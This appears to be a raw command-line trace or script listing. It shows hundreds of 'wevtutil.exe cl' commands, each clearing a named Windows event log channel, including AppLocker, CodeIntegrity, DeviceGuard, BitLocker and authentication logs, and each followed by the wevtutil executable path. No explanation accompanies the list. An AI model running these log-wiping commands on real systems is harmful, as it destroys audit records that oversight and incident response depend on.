wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AAD/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/General"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppID/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppSruProv"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Informational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Backup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Call"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUpdateAgent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Disk/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Documents/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DucUpdateAgent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"

C:\Windows\system32\wevtutil.exe

